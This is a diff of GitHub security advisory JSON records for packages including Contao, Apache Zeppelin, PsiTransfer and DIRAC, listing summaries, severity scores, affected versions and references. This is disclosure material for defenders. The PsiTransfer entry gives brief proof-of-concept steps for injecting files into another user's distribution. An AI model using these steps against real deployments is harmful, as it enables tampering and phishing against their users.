"CVE-2024-28234" + ], + "summary": "Contao: Insufficient BBCode sanitizer", + "details": "### Impact\n\nIf BBCode is enabled for comments, users can inject CSS styles.\n\n### Patches\n\nUpdate to Contao 4.13.40 or 5.3.4.\n\n### Workarounds\n\nDisable BBCode for comments.\n\n### References\n\nhttps://contao.org/en/security-advisories/insufficient-bbcode-sanitization\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/comments-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "4.13.40" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/comments-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/contao/contao/security/advisories/GHSA-j55w-hjpj-825g" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28234" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/55b995d8d35da0d36bc6a22c53fe6423ab0c4ae2" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/6d42e667177c972ae7c219645593c262d7764ce2" + }, + { + "type": "WEB", + "url": "https://contao.org/en/security-advisories/insufficient-bbcode-sanitization" + }, + { + "type": "PACKAGE", + "url": "https://github.com/contao/contao" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T18:52:54Z", + "nvd_published_at": "2024-04-09T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-m65c-wmw9-vmpp/GHSA-m65c-wmw9-vmpp.json b/advisories/github-reviewed/2024/04/GHSA-m65c-wmw9-vmpp/GHSA-m65c-wmw9-vmpp.json new file mode 100644 index 00000000000..bf58e78320b --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-m65c-wmw9-vmpp/GHSA-m65c-wmw9-vmpp.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m65c-wmw9-vmpp", + "modified": "2024-04-09T18:53:31Z", + "published": "2024-04-09T12:30:47Z", + "aliases": [ + "CVE-2024-31863" + ], + "summary": "Apache Zeppelin: Replacing other users notebook, bypassing any permissions", + "details": "Authentication Bypass by Spoofing vulnerability by replacing to exsiting notes in Apache Zeppelin. This issue affects Apache Zeppelin: from 0.10.1 before 0.11.0.\n\nUsers are recommended to upgrade to version 0.11.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.zeppelin:zeppelin-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.10.1" + }, + { + "fixed": "0.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31863" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/commit/f025a697c1d1d0264064d5adf6cb0b20d85041b6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/zeppelin" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/3od2gfpwllmtc9c5ggw04ohn8s7w3ct9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T18:53:31Z", + "nvd_published_at": "2024-04-09T11:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-mc39-h54g-pvw6/GHSA-mc39-h54g-pvw6.json b/advisories/github-reviewed/2024/04/GHSA-mc39-h54g-pvw6/GHSA-mc39-h54g-pvw6.json new file mode 100644 index 00000000000..c84112d12a8 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-mc39-h54g-pvw6/GHSA-mc39-h54g-pvw6.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mc39-h54g-pvw6", + "modified": "2024-04-05T15:42:39Z", + "published": "2024-04-05T15:42:39Z", + "aliases": [ + + ], + "summary": "libdav1d-sys affected by dav1d AV1 decoder integer overflow", + "details": "An integer overflow in dav1d AV1 decoder that can occur when decoding videos with large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading to version 0.7.0 of libdav1d-sys, which includes dav1d 1.4.0.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "libdav1d-sys" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "PACKAGE", + "url": "https://github.com/njaard/libavif-rs" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2024-0016.html" + }, + { + "type": "WEB", + "url": "https://www.cvedetails.com/cve/CVE-2024-1580" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-05T15:42:39Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-p28x-hj68-7vfp/GHSA-p28x-hj68-7vfp.json b/advisories/github-reviewed/2024/04/GHSA-p28x-hj68-7vfp/GHSA-p28x-hj68-7vfp.json new file mode 100644 index 00000000000..7a8e4bd7984 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-p28x-hj68-7vfp/GHSA-p28x-hj68-7vfp.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p28x-hj68-7vfp", + "modified": "2024-04-08T16:46:52Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-28732" + ], + "summary": "Ryu Infinite Loop vulnerability", + "details": "An issue was discovered in OFPMatch in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ryu" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.34" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28732" + }, + { + "type": "WEB", + "url": "https://github.com/faucetsdn/ryu/issues/188" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ErodedElk/1133d64dde2d92393a065edc9b243792" + }, + { + "type": "PACKAGE", + "url": "https://github.com/faucetsdn/ryu" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T16:46:52Z", + "nvd_published_at": "2024-04-08T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-prvg-rh5h-74jr/GHSA-prvg-rh5h-74jr.json b/advisories/github-reviewed/2024/04/GHSA-prvg-rh5h-74jr/GHSA-prvg-rh5h-74jr.json new file mode 100644 index 00000000000..eea87a9660d --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-prvg-rh5h-74jr/GHSA-prvg-rh5h-74jr.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-prvg-rh5h-74jr", + "modified": "2024-04-09T16:23:03Z", + "published": "2024-04-09T12:30:46Z", + "aliases": [ + "CVE-2021-28656" + ], + "summary": "Apache Zeppelin CSRF vulnerability in the Credentials page", + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Credential page of Apache Zeppelin allows an attacker to submit malicious request. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.zeppelin:zeppelin-web" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.9.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28656" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/zeppelin" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/dttzkkv4qyn1rq2fdv1r94otb1osxztc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:23:03Z", + "nvd_published_at": "2024-04-09T10:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-r4r6-j2j3-7pp5/GHSA-r4r6-j2j3-7pp5.json b/advisories/github-reviewed/2024/04/GHSA-r4r6-j2j3-7pp5/GHSA-r4r6-j2j3-7pp5.json new file mode 100644 index 00000000000..bc23dc34b20 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-r4r6-j2j3-7pp5/GHSA-r4r6-j2j3-7pp5.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4r6-j2j3-7pp5", + "modified": "2024-04-09T21:12:19Z", + "published": "2024-04-09T16:15:06Z", + "aliases": [ + "CVE-2024-30262" + ], + "summary": "Contao: Remember-me tokens will not be cleared after a password change", + "details": "### Impact\n\nWhen a front end member changes their password, the corresponding remember-me tokens are not removed.\n\n### Patches\n\nUpdate to Contao 4.13.40.\n\n### Workarounds\n\nDisable \"Allow auto login\" in the login module.\n\n### References\n\nhttps://contao.org/en/security-advisories/remember-me-tokens-are-not-cleared-after-a-password-change\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.13.40" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/contao/contao/security/advisories/GHSA-r4r6-j2j3-7pp5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30262" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/3032baa456f607169ffae82a8920354adb338fe9" + }, + { + "type": "WEB", + "url": "https://contao.org/en/security-advisories/remember-me-tokens-are-not-cleared-after-a-password-change" + }, + { + "type": "PACKAGE", + "url": "https://github.com/contao/contao" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384", + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:15:06Z", + "nvd_published_at": "2024-04-09T17:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-r956-2553-vvhr/GHSA-r956-2553-vvhr.json b/advisories/github-reviewed/2024/04/GHSA-r956-2553-vvhr/GHSA-r956-2553-vvhr.json new file mode 100644 index 00000000000..af98dd3d619 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-r956-2553-vvhr/GHSA-r956-2553-vvhr.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r956-2553-vvhr", + "modified": "2024-04-08T15:45:37Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2021-4438" + ], + "summary": "React Native Sms User Consent Intent Redirection Vulnerability", + "details": "A vulnerability, which was classified as critical, has been found in kyivstarteam react-native-sms-user-consent up to 1.1.4 on Android. Affected by this issue is the function `registerReceiver` of the file `android/src/main/java/ua/kyivstar/reactnativesmsuserconsent/SmsUserConsentModule.kt`. The manipulation leads to improper export of android application components. Attacking locally is a requirement. Upgrading to version 1.1.5 is able to address this issue. The name of the patch is 5423dcb0cd3e4d573b5520a71fa08aa279e4c3c7. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259508.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@kyivstarteam/react-native-sms-user-consent" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4438" + }, + { + "type": "WEB", + "url": "https://github.com/kyivstarteam/react-native-sms-user-consent/pull/4" + }, + { + "type": "WEB", + "url": "https://github.com/kyivstarteam/react-native-sms-user-consent/commit/5423dcb0cd3e4d573b5520a71fa08aa279e4c3c7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/kyivstarteam/react-native-sms-user-consent" + }, + { + "type": "WEB", + "url": "https://github.com/kyivstarteam/react-native-sms-user-consent/releases/tag/1.1.5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259508" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259508" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T15:45:37Z", + "nvd_published_at": "2024-04-07T09:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-rhh4-rh7c-7r5v/GHSA-rhh4-rh7c-7r5v.json b/advisories/github-reviewed/2024/04/GHSA-rhh4-rh7c-7r5v/GHSA-rhh4-rh7c-7r5v.json new file mode 100644 index 00000000000..7e55134cf3f --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-rhh4-rh7c-7r5v/GHSA-rhh4-rh7c-7r5v.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhh4-rh7c-7r5v", + "modified": "2024-04-08T15:44:41Z", + "published": "2024-04-06T18:31:17Z", + "aliases": [ + "CVE-2024-0406" + ], + "summary": "Archiver Path Traversal vulnerability", + "details": "A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted tar file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the creation or overwriting of files with the user's or application's privileges using the library.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mholt/archiver/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "last_affected": "3.5.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mholt/archiver" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "last_affected": "3.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0406" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0406" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257749" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mholt/archiver" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T15:44:41Z", + "nvd_published_at": "2024-04-06T17:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-rr59-h6rh-v84v/GHSA-rr59-h6rh-v84v.json b/advisories/github-reviewed/2024/04/GHSA-rr59-h6rh-v84v/GHSA-rr59-h6rh-v84v.json new file mode 100644 index 00000000000..d0227d6b002 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-rr59-h6rh-v84v/GHSA-rr59-h6rh-v84v.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr59-h6rh-v84v", + "modified": "2024-04-09T16:23:54Z", + "published": "2024-04-09T12:30:47Z", + "aliases": [ + "CVE-2022-47894" + ], + "summary": "Apache Zeppelin SAP: connecting to a malicious SAP server allowed it to perform XXE", + "details": "Improper Input Validation vulnerability in Apache Zeppelin SAP. This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0.\n\nAs this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.\n\nFor more information, the fix already was merged in the source code but Zeppelin decided to retire the SAP component\nNOTE: This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.zeppelin:sap" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47894" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4302" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/commit/bea51d1467d6103bd8fd68d6a27b14f954d98ec6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/zeppelin" + }, + { + "type": "WEB", + "url": "https://issues.apache.org/jira/browse/ZEPPELIN-5665" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/csf4k73kkn3nx58pm0p2qrylbox4fvyy" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20", + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T16:23:54Z", + "nvd_published_at": "2024-04-09T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-v24p-7p4j-qvvf/GHSA-v24p-7p4j-qvvf.json b/advisories/github-reviewed/2024/04/GHSA-v24p-7p4j-qvvf/GHSA-v24p-7p4j-qvvf.json new file mode 100644 index 00000000000..a380b6a3ae8 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-v24p-7p4j-qvvf/GHSA-v24p-7p4j-qvvf.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v24p-7p4j-qvvf", + "modified": "2024-04-09T18:52:47Z", + "published": "2024-04-09T18:52:46Z", + "aliases": [ + "CVE-2024-28190" + ], + "summary": "Contao: Cross site scripting in the file manager", + "details": "### Impact\n\nUsers can insert malicious code into file names when uploading files, which is then executed in tooltips and popups in the backend.\n\n### Patches\n\nUpdate to Contao 4.13.40 or Contao 5.3.4.\n\n### Workarounds\n\nDisable uploads for untrusted users.\n\n### References\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-in-the-file-manager\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).\n\n### Credits\n\nThanks to Alexander Wuttke for reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.13.40" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/contao/contao/security/advisories/GHSA-v24p-7p4j-qvvf" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28190" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/878d28dbe0f408740555d6fc8b634bd3f8febfce" + }, + { + "type": "WEB", + "url": "https://github.com/contao/contao/commit/b794e14fff070101bf6a885da9b1a83395093b4d" + }, + { + "type": "WEB", + "url": "https://contao.org/en/security-advisories/cross-site-scripting-in-the-file-manager" + }, + { + "type": "PACKAGE", + "url": "https://github.com/contao/contao" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T18:52:46Z", + "nvd_published_at": "2024-04-09T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-v4mm-q8fv-r2w5/GHSA-v4mm-q8fv-r2w5.json b/advisories/github-reviewed/2024/04/GHSA-v4mm-q8fv-r2w5/GHSA-v4mm-q8fv-r2w5.json new file mode 100644 index 00000000000..0b8be8b7360 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-v4mm-q8fv-r2w5/GHSA-v4mm-q8fv-r2w5.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4mm-q8fv-r2w5", + "modified": "2024-04-09T18:53:09Z", + "published": "2024-04-09T09:31:10Z", + "aliases": [ + "CVE-2024-1233" + ], + "summary": "WildFly Elytron: SSRF security issue", + "details": "A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.wildfly.security:wildfly-elytron-realm-token" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.4.0.CR1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1233" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-1233" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262849" + }, + { + "type": "PACKAGE", + "url": "https://github.com/wildfly-security/wildfly-elytron" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T18:53:09Z", + "nvd_published_at": "2024-04-09T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-v6f3-gh5h-mqwx/GHSA-v6f3-gh5h-mqwx.json b/advisories/github-reviewed/2024/04/GHSA-v6f3-gh5h-mqwx/GHSA-v6f3-gh5h-mqwx.json new file mode 100644 index 00000000000..8e25b244e9b --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-v6f3-gh5h-mqwx/GHSA-v6f3-gh5h-mqwx.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6f3-gh5h-mqwx", + "modified": "2024-04-09T21:12:12Z", + "published": "2024-04-09T15:52:17Z", + "aliases": [ + "CVE-2024-29905" + ], + "summary": "DIRAC: Unauthorized users can read proxy contents during generation", + "details": "### Impact\n\nDuring the proxy generation process (e.g., when using `dirac-proxy-init`) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.\n\nThis vulnerability only exists for a short period of time (sub-millsecond) during the generation process.\n\n### Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n\nSetting the `X509_USER_PROXY` environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (`/tmp/x509up_uNNNN`).\n\n### References\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "DIRAC" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.41" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-v6f3-gh5h-mqwx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29905" + }, + { + "type": "WEB", + "url": "https://github.com/DIRACGrid/DIRAC/commit/1faa709341969a6321e29c843ca94039d33b2c3d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/DIRACGrid/DIRAC" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-668" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T15:52:17Z", + "nvd_published_at": "2024-04-09T17:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-xg8v-m2mh-45m6/GHSA-xg8v-m2mh-45m6.json b/advisories/github-reviewed/2024/04/GHSA-xg8v-m2mh-45m6/GHSA-xg8v-m2mh-45m6.json new file mode 100644 index 00000000000..0666f15d259 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-xg8v-m2mh-45m6/GHSA-xg8v-m2mh-45m6.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xg8v-m2mh-45m6", + "modified": "2024-04-09T18:46:53Z", + "published": "2024-04-05T17:15:24Z", + "aliases": [ + "CVE-2024-31453" + ], + "summary": "PsiTransfer: Violation of the integrity of file distribution", + "details": "**Summary**\nThe absence of restrictions on the endpoint, which allows you to create a path for uploading a file in a file distribution, allows an attacker to add arbitrary files to the distribution.\n\n**Details**\nVulnerable endpoint: POST /files\n\n**PoC**\n1. Create a file distribution.\n\"Снимок\n\n2. Go to the link address (id of the file distribution is needed by an attacker to upload files there).\n\"Снимок\n\n3. Send a POST /files. As the value of the Upload-Metadata header we specify the sid parameter with the id of the file distribution obtained in the second step. In the response from the server in the Location header we get the path for uploading a new file to the file distribution.\n\"Снимок\n\n5. Send a PATCH /files/{{id}} request with arbitrary content in the request body. Id is taken from the previous step.\n\"Снимок\n\nResult:\n\"Снимок\n\"Снимок\n\n**Impact**\nThe vulnerability allows an attacker to influence those users who come to the file distribution after him and slip the victim files with a malicious or phishing signature.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "psitransfer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/psi-4ward/psitransfer/security/advisories/GHSA-xg8v-m2mh-45m6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31453" + }, + { + "type": "WEB", + "url": "https://github.com/psi-4ward/psitransfer/commit/b9853c97e6911e1c1c5341245ca1eb363fda5269" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psi-4ward/psitransfer" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-04-05T17:15:24Z", + "nvd_published_at": "2024-04-09T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-23ff-j3f9-vw6f/GHSA-23ff-j3f9-vw6f.json b/advisories/unreviewed/2022/05/GHSA-23ff-j3f9-vw6f/GHSA-23ff-j3f9-vw6f.json index c15f47fc1d1..96731dc9ef0 100644 --- a/advisories/unreviewed/2022/05/GHSA-23ff-j3f9-vw6f/GHSA-23ff-j3f9-vw6f.json +++ b/advisories/unreviewed/2022/05/GHSA-23ff-j3f9-vw6f/GHSA-23ff-j3f9-vw6f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-23ff-j3f9-vw6f", - "modified": "2022-05-24T19:03:32Z", + "modified": "2024-04-07T12:31:03Z", "published": "2022-05-24T19:03:32Z", "aliases": [ "CVE-2021-30499" @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948679" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00004.html" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV" diff --git a/advisories/unreviewed/2022/05/GHSA-26x8-wc99-6x99/GHSA-26x8-wc99-6x99.json 